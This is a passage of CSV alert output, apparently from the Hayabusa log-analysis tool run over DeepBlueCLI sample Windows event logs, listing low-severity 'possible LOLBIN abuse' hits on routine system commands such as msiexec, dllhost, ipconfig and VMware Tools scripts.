2016-09-03 23:51:37.272 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xae8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:51:37.462 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding CE81D9B1345CD9F81599FCA563520F29 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1014 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:52:34.610 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xc3c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:52:34.820 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 03F824F4D05CDB05A799DCD0DF81BAF1 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x910 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:53:22.275 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1028 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:53:22.491 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 4DBAF3FC1CB10E33B65E99A4560027B6 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xb90 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-03 23:53:23.408 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0xefc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 00:52:11.006 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xfb8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 06:19:44.532 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x928 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 06:19:44.676 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xe20 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 06:19:44.692 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x270 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 06:21:44.528 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xe88 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 06:27:33.432 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 06:34:52.733 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0x101c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 06:34:54.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-04 06:35:14.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-04 06:35:14.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-09-04 06:35:15.773 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6fc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 06:35:16.101 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x514 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 06:35:29.507 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x9d0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 06:35:29.601 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xa34 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 06:35:40.667 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xd00 | User: IEUser | LID: 0x60b6f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 06:35:46.165 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xe90 | User: IEUser | LID: 0x60b6f,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-04 06:36:24.719 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xad4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 06:36:26.520 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x398 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 06:48:30.867 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x650 | User: IEUser | LID: 0x60b9d",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 07:57:17.289 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x794 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 07:57:39.909 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb68 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 08:03:14.642 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x9d0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 08:03:14.751 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xcc0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 22:32:04.123 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0x234 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 22:32:05.218 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x93c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 22:32:05.234 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware 
Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xd94 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 22:32:05.439 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x958 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 22:32:15.400 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xa60 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 22:32:23.091 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x67c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 23:37:56.230 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x944 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 23:37:59.307 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd64 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 23:39:22.859 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdcc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-04 23:39:28.137 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x224 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-05 00:10:41.119 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x740 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-05 00:10:41.316 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x44c | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-15 11:13:20.120 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xd98 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-15 11:13:20.122 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0xfa0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-15 11:13:21.221 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x7a8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-15 11:13:21.470 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xa7c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-15 11:13:30.470 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | 
PID: 0xd50 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-15 12:28:48.887 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb94 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-15 12:28:49.170 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb64 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-15 23:50:16.005 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x820 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-15 23:50:16.427 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x234 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-15 23:50:25.279 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN 
""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x56c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-16 00:01:09.025 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x628 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-16 00:01:09.291 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xda4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-16 05:09:57.316 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-16 05:09:57.628 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x110 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-16 05:28:03.628 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe64 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-16 05:28:03.894 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x744 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:53:42.990 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x9b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:53:44.147 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc64 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:53:44.490 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xab8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:53:53.459 
